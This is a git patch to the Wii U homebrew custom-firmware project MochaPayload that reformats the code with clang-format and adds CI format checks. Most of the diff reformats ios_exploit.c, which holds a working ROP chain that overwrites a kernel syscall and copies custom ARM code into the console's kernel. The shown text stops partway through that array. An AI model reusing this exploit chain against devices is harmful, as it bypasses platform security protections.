From 8015a18f24611c424e207b43176272fd04ea8440 Mon Sep 17 00:00:00 2001 From: Maschell Date: Fri, 4 Feb 2022 14:23:22 +0100 Subject: [PATCH] Format the code via clang-format --- .clang-format | 67 +++ .github/workflows/ci.yml | 10 +- .github/workflows/pr.yml | 8 + README.md | 9 +- source/common/ipc_defs.h | 27 +- source/common/kernel_commands.h | 10 +- source/ios_exploit.c | 512 ++++++++++----------- source/ios_kernel/source/elf_abi.h | 1 + source/ios_kernel/source/elf_patcher.c | 6 +- source/ios_kernel/source/elf_patcher.h | 8 +- source/ios_kernel/source/fsa.c | 43 +- source/ios_kernel/source/fsa.h | 24 +- source/ios_kernel/source/instant_patches.c | 48 +- source/ios_kernel/source/ios_mcp_patches.c | 6 +- source/ios_kernel/source/ios_mcp_patches.h | 4 +- source/ios_kernel/source/kernel_patches.c | 49 +- source/ios_kernel/source/kernel_patches.h | 2 + source/ios_kernel/source/main.c | 12 +- source/ios_kernel/source/thread.h | 18 +- source/ios_kernel/source/utils.c | 2 +- source/ios_kernel/source/utils.h | 29 +- source/ios_mcp/source/fsa.c | 125 ++--- source/ios_mcp/source/fsa.h | 8 +- source/ios_mcp/source/imports.h | 6 +- source/ios_mcp/source/ipc.c | 200 ++++---- source/ios_mcp/source/ipc_types.h | 30 +- source/ios_mcp/source/logger.c | 39 +- source/ios_mcp/source/logger.h | 5 +- source/ios_mcp/source/main.c | 2 +- source/ios_mcp/source/mcp_loadfile.c | 76 +-- source/ios_mcp/source/net_ifmgr_ncl.c | 10 +- source/ios_mcp/source/socket.c | 32 +- source/ios_mcp/source/socket.h | 102 ++-- source/ios_mcp/source/types.h | 4 +- source/ios_mcp/source/wupserver.c | 114 ++--- source/ios_usb/source/main.c | 4 +- source/main.cpp | 8 +- 37 files changed, 877 insertions(+), 783 deletions(-) create mode 100644 .clang-format diff --git a/.clang-format b/.clang-format new file mode 100644 index 0000000..56cc685 --- /dev/null +++ b/.clang-format @@ -0,0 +1,67 @@ +# Generated from CLion C/C++ Code Style settings +BasedOnStyle: LLVM +AccessModifierOffset: -4 +AlignAfterOpenBracket: Align +AlignConsecutiveAssignments: Consecutive +AlignConsecutiveMacros: AcrossEmptyLinesAndComments +AlignOperands: Align +AllowAllArgumentsOnNextLine: false +AllowAllConstructorInitializersOnNextLine: false +AllowAllParametersOfDeclarationOnNextLine: false +AllowShortBlocksOnASingleLine: Always +AllowShortCaseLabelsOnASingleLine: false +AllowShortFunctionsOnASingleLine: All +AllowShortIfStatementsOnASingleLine: Always +AllowShortLambdasOnASingleLine: All +AllowShortLoopsOnASingleLine: true +AlwaysBreakAfterReturnType: None +AlwaysBreakTemplateDeclarations: Yes +BreakBeforeBraces: Custom +BraceWrapping: + AfterCaseLabel: false + AfterClass: false + AfterControlStatement: Never + AfterEnum: false + AfterFunction: false + AfterNamespace: false + AfterUnion: false + BeforeCatch: false + BeforeElse: false + IndentBraces: false + SplitEmptyFunction: false + SplitEmptyRecord: true +BreakBeforeBinaryOperators: None +BreakBeforeTernaryOperators: true +BreakConstructorInitializers: BeforeColon +BreakInheritanceList: BeforeColon +ColumnLimit: 0 +CompactNamespaces: false +ContinuationIndentWidth: 8 +IndentCaseLabels: true +IndentPPDirectives: None +IndentWidth: 4 +KeepEmptyLinesAtTheStartOfBlocks: true +MaxEmptyLinesToKeep: 2 +NamespaceIndentation: All +ObjCSpaceAfterProperty: false +ObjCSpaceBeforeProtocolList: true +PointerAlignment: Right +ReflowComments: false +SpaceAfterCStyleCast: true +SpaceAfterLogicalNot: false +SpaceAfterTemplateKeyword: false +SpaceBeforeAssignmentOperators: true +SpaceBeforeCpp11BracedList: false +SpaceBeforeCtorInitializerColon: true +SpaceBeforeInheritanceColon: true +SpaceBeforeParens: ControlStatements +SpaceBeforeRangeBasedForLoopColon: true +SpaceInEmptyParentheses: false +SpacesBeforeTrailingComments: 1 +SpacesInAngles: false +SpacesInCStyleCastParentheses: false +SpacesInContainerLiterals: false +SpacesInParentheses: false +SpacesInSquareBrackets: false +TabWidth: 4 +UseTab: Never diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 6d525aa..b6d49d3 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -6,8 +6,16 @@ on: - master jobs: + clang-format: + runs-on: ubuntu-18.04 + steps: + - uses: actions/checkout@v2 + - name: clang-format + run: | + docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source build-binary: runs-on: ubuntu-18.04 + needs: clang-format steps: - uses: actions/checkout@v2 - name: build binary @@ -54,4 +62,4 @@ jobs: upload_url: ${{ steps.create_release.outputs.upload_url }} # This pulls from the CREATE RELEASE step above, referencing it's ID to get its outputs object, which include a `upload_url`. See this blog post for more info: https://jasonet.co/posts/new-features-of-github-actions/#passing-data-to-future-steps asset_path: ./${{ env.REPOSITORY_NAME }}_${{ env.DATETIME }}.zip asset_name: ${{ env.REPOSITORY_NAME }}_${{ env.DATETIME }}.zip - asset_content_type: application/unknown \ No newline at end of file + asset_content_type: application/zip \ No newline at end of file diff --git a/.github/workflows/pr.yml b/.github/workflows/pr.yml index f907f7e..7464b72 100644 --- a/.github/workflows/pr.yml +++ b/.github/workflows/pr.yml @@ -3,8 +3,16 @@ name: CI-PR on: [pull_request] jobs: + clang-format: + runs-on: ubuntu-18.04 + steps: + - uses: actions/checkout@v2 + - name: clang-format + run: | + docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source build-binary: runs-on: ubuntu-18.04 + needs: clang-format steps: - uses: actions/checkout@v2 - name: build binary diff --git a/README.md b/README.md index 0b03ffb..e16a4c1 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,7 @@ +[![CI-Release](https://github.com/wiiu-env/MochaPayload/actions/workflows/ci.yml/badge.svg)](https://github.com/wiiu-env/MochaPayload/actions/workflows/ci.yml) + # MochaPayload - a simple custom firmware -This a lite version of the [original mocha](https://github.com/dimok789/mocha) to be used with the [EnvironmentLoader](https://github.com/wiiu-env/EnvironmentLoader). +This a version of the [original mocha](https://github.com/dimok789/mocha) to be used with the [EnvironmentLoader](https://github.com/wiiu-env/EnvironmentLoader). ## Usage Place the `00_mocha.rpx` in the `[ENVIRONMENT]/modules/setup` folder and run the [EnvironmentLoader](https://github.com/wiiu-env/EnvironmentLoader). @@ -15,7 +17,6 @@ Place the `00_mocha.rpx` in the `[ENVIRONMENT]/modules/setup` folder and run the For building you just need [wut](https://github.com/devkitPro/wut/) installed, then use the `make` command. - ## Building using the Dockerfile It's possible to use a docker image for building. This way you don't need anything installed on your host system. @@ -31,6 +32,10 @@ docker run -it --rm -v ${PWD}:/project mochapayload-builder make docker run -it --rm -v ${PWD}:/project mochapayload-builder make clean ``` +## Format the code via docker + +`docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source -i` + ## Credits dimok Maschell diff --git a/source/common/ipc_defs.h b/source/common/ipc_defs.h index d0fe34e..7d653e6 100644 --- a/source/common/ipc_defs.h +++ b/source/common/ipc_defs.h @@ -2,14 +2,15 @@ #include #include +#include -#define CHECK_SIZE(Type, Size) \ - static_assert(sizeof(Type) == Size, \ - #Type " must be " #Size " bytes") +#define CHECK_SIZE(Type, Size) \ + static_assert(sizeof(Type) == Size, \ + #Type " must be " #Size " bytes") -#define CHECK_OFFSET(Type, Offset, Field) \ - static_assert(offsetof(Type, Field) == Offset, \ - #Type "::" #Field " must be at offset " #Offset) +#define CHECK_OFFSET(Type, Offset, Field) \ + static_assert(offsetof(Type, Field) == Offset, \ + #Type "::" #Field " must be at offset " #Offset) typedef struct __attribute__((packed)) { uint64_t title_id; @@ -222,11 +223,11 @@ typedef struct { unsigned char unk3[0x12D8 - 0x68]; } MCPLoadFileRequest; -#define IPC_CUSTOM_START_MCP_THREAD 0xFE -#define IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED 0xFD -#define IPC_CUSTOM_LOAD_CUSTOM_RPX 0xFC -#define IPC_CUSTOM_META_XML_READ 0xFB -#define IPC_CUSTOM_START_USB_LOGGING 0xFA -#define IPC_CUSTOM_COPY_ENVIRONMENT_PATH 0xF9 +#define IPC_CUSTOM_START_MCP_THREAD 0xFE +#define IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED 0xFD +#define IPC_CUSTOM_LOAD_CUSTOM_RPX 0xFC +#define IPC_CUSTOM_META_XML_READ 0xFB +#define IPC_CUSTOM_START_USB_LOGGING 0xFA +#define IPC_CUSTOM_COPY_ENVIRONMENT_PATH 0xF9 -#define LOAD_FILE_TARGET_SD_CARD 0 +#define LOAD_FILE_TARGET_SD_CARD 0 diff --git a/source/common/kernel_commands.h b/source/common/kernel_commands.h index dda3816..53cf88e 100644 --- a/source/common/kernel_commands.h +++ b/source/common/kernel_commands.h @@ -24,10 +24,10 @@ #ifndef KERNEL_COMMANDS_H_ #define KERNEL_COMMANDS_H_ -#define KERNEL_READ32 1 -#define KERNEL_WRITE32 2 -#define KERNEL_MEMCPY 3 -#define KERNEL_GET_CFW_CONFIG 4 -#define KERNEL_READ_OTP 5 +#define KERNEL_READ32 1 +#define KERNEL_WRITE32 2 +#define KERNEL_MEMCPY 3 +#define KERNEL_GET_CFW_CONFIG 4 +#define KERNEL_READ_OTP 5 #endif diff --git a/source/ios_exploit.c b/source/ios_exploit.c index cd1b8d5..bbc45b5 100644 --- a/source/ios_exploit.c +++ b/source/ios_exploit.c @@ -1,19 +1,19 @@ -#include -#include -#include -#include -#include #include "ios_exploit.h" +#include +#include +#include +#include +#include -#define ALIGN4(x) (((x) + 3) & ~3) +#define ALIGN4(x) (((x) + 3) & ~3) -#define CHAIN_START 0x1016AD40 -#define SHUTDOWN 0x1012EE4C -#define SIMPLE_RETURN 0x101014E4 -#define SOURCE (0x120000) -#define IOS_CREATETHREAD 0x1012EABC -#define ARM_CODE_BASE 0x08135000 -#define REPLACE_SYSCALL 0x081298BC +#define CHAIN_START 0x1016AD40 +#define SHUTDOWN 0x1012EE4C +#define SIMPLE_RETURN 0x101014E4 +#define SOURCE (0x120000) +#define IOS_CREATETHREAD 0x1012EABC +#define ARM_CODE_BASE 0x08135000 +#define REPLACE_SYSCALL 0x081298BC extern const uint8_t launch_image_tga[]; extern const uint32_t launch_image_tga_size; @@ -24,7 +24,7 @@ static int uhs_write32(int uhs_handle, int arm_addr, int val); //!------Variables used in exploit------ static int *pretend_root_hub = (int *) 0xF5003ABC; -static int *ayylmao = (int *) 0xF4500000; +static int *ayylmao = (int *) 0xF4500000; //!------------------------------------- typedef struct __attribute__((packed)) { @@ -34,271 +34,271 @@ typedef struct __attribute__((packed)) { /* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */ #include "ios_kernel/ios_kernel.bin.h" -#include "ios_usb/ios_usb.bin.h" #include "ios_mcp/ios_mcp.bin.h" +#include "ios_usb/ios_usb.bin.h" /* ROP CHAIN STARTS HERE (0x1015BD78) */ static const int final_chain[] = { - 0x101236f3, // 0x00 POP {R1-R7,PC} - 0x0, // 0x04 arg - 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR - 0x68, // 0x0C stacksize - 0x10101638, // 0x10 - 0x0, // 0x14 - 0x0, // 0x18 - 0x0, // 0x1C - 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x30 - 0x0, // 0x34 - IOS_CREATETHREAD, // 0x38 - 0x1, // 0x3C - 0x2, // 0x40 - 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} + 0x101236f3, // 0x00 POP {R1-R7,PC} + 0x0, // 0x04 arg + 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR + 0x68, // 0x0C stacksize + 0x10101638, // 0x10 + 0x0, // 0x14 + 0x0, // 0x18 + 0x0, // 0x1C + 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x30 + 0x0, // 0x34 + IOS_CREATETHREAD, // 0x38 + 0x1, // 0x3C + 0x2, // 0x40 + 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE92D4010, // 0x4C value: PUSH {R4,LR} - 0x0, // 0x50 - 0x10123a8b, // 0x54 POP {R3,R4,PC} - 0x1, // 0x58 R3 must be 1 for the arbitrary write - 0x0, // 0x5C - 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x64 - 0x0, // 0x68 - 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) - 0x0, // 0x70 - 0x0, // 0x74 - 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} + 0xE92D4010, // 0x4C value: PUSH {R4,LR} + 0x0, // 0x50 + 0x10123a8b, // 0x54 POP {R3,R4,PC} + 0x1, // 0x58 R3 must be 1 for the arbitrary write + 0x0, // 0x5C + 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x64 + 0x0, // 0x68 + 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) + 0x0, // 0x70 + 0x0, // 0x74 + 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A04000, // 0x80 value: MOV R4, R0 - 0x0, // 0x84 - 0x10123a8b, // 0x88 POP {R3,R4,PC} - 0x1, // 0x8C R3 must be 1 for the arbitrary write - 0x0, // 0x90 - 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x98 - 0x0, // 0x9C - 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) - 0x0, // 0xA4 - 0x0, // 0xA8 - 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} + 0xE1A04000, // 0x80 value: MOV R4, R0 + 0x0, // 0x84 + 0x10123a8b, // 0x88 POP {R3,R4,PC} + 0x1, // 0x8C R3 must be 1 for the arbitrary write + 0x0, // 0x90 + 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x98 + 0x0, // 0x9C + 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) + 0x0, // 0xA4 + 0x0, // 0xA8 + 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF - 0x0, // 0xB8 - 0x10123a8b, // 0xBC POP {R3,R4,PC} - 0x1, // 0xC0 R3 must be 1 for the arbitrary write - 0x0, // 0xC4 - 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0xCC - 0x0, // 0xD0 - 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) - 0x0, // 0xD8 - 0x0, // 0xDC - 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} + 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF + 0x0, // 0xB8 + 0x10123a8b, // 0xBC POP {R3,R4,PC} + 0x1, // 0xC0 R3 must be 1 for the arbitrary write + 0x0, // 0xC4 + 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0xCC + 0x0, // 0xD0 + 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) + 0x0, // 0xD8 + 0x0, // 0xDC + 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) - 0x0, // 0xEC - 0x10123a8b, // 0xF0 POP {R3,R4,PC} - 0x1, // 0xF4 R3 must be 1 for the arbitrary write - 0x0, // 0xF8 - 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x100 - 0x0, // 0x104 - 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) - 0x0, // 0x10C - 0x0, // 0x110 - 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} + 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) + 0x0, // 0xEC + 0x10123a8b, // 0xF0 POP {R3,R4,PC} + 0x1, // 0xF4 R3 must be 1 for the arbitrary write + 0x0, // 0xF8 + 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x100 + 0x0, // 0x104 + 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) + 0x0, // 0x10C + 0x0, // 0x110 + 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A00004, // 0x11C value: MOV R0, R4 - 0x0, // 0x120 - 0x10123a8b, // 0x124 POP {R3,R4,PC} - 0x1, // 0x128 R3 must be 1 for the arbitrary write - 0x0, // 0x12C - 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x134 - 0x0, // 0x138 - 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) - 0x0, // 0x140 - 0x0, // 0x144 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xE1A00004, // 0x11C value: MOV R0, R4 + 0x0, // 0x120 + 0x10123a8b, // 0x124 POP {R3,R4,PC} + 0x1, // 0x128 R3 must be 1 for the arbitrary write + 0x0, // 0x12C + 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x134 + 0x0, // 0x138 + 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) + 0x0, // 0x140 + 0x0, // 0x144 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x00000000, // 0x150 value: NOP - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0x00000000, // 0x150 value: NOP + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x1AFFFFFD, // 0x150 value: BNE clean_loop - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0x1AFFFFFD, // 0x150 value: BNE clean_loop + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A03004, // 0x184 value: MOV R3, R4 - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + 0xE1A03004, // 0x184 value: MOV R3, R4 + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE8BD4010, // 0x184 value: POP {R4,LR} - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} + 0xE8BD4010, // 0x184 value: POP {R4,LR} + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) - 0x0, // 0x1BC - 0x10123a8b, // 0x1C0 POP {R3,R4,PC} - 0x1, // 0x1C4 R3 must be 1 for the arbitrary write - 0x0, // 0x1C8 - 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x1D0 - 0x0, // 0x1D4 - 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) + 0x0, // 0x1BC + 0x10123a8b, // 0x1C0 POP {R3,R4,PC} + 0x1, // 0x1C4 R3 must be 1 for the arbitrary write + 0x0, // 0x1C8 + 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x1D0 + 0x0, // 0x1D4 + 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 - 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches - 0x0, // 0x1E0 - 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - ARM_CODE_BASE, // 0x1E8 our code destination address - 0x0, // 0x1EC - 0x0, // 0x1F0 - 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} - 0x0, // 0x1F8 - sizeof(ios_kernel), // 0x1FC our code size - 0x0, // 0x200 - 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} - 0x00140000, // 0x208 our code source location - 0x08131D04, // 0x20C KERNEL_MEMCPY address - 0x0, // 0x210 - 0x0, // 0x214 - 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) + 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches + 0x0, // 0x1E0 + 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) + 0x0, // 0x1DC + 